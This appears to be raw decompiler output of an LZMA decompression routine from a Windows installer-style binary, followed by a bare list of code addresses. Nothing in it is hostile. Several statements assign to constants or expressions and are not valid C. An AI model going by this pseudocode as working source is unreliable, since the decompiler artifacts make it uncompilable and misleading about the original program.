							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d5f
                                                    0x00406d64
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00407441
                                                    0x00407441
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x0040741c
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x00000000
                                                    0x004075cf
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00000000
                                                    0x0040743e
                                                    0x00406d66
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d8b
                                                    0x00406d92
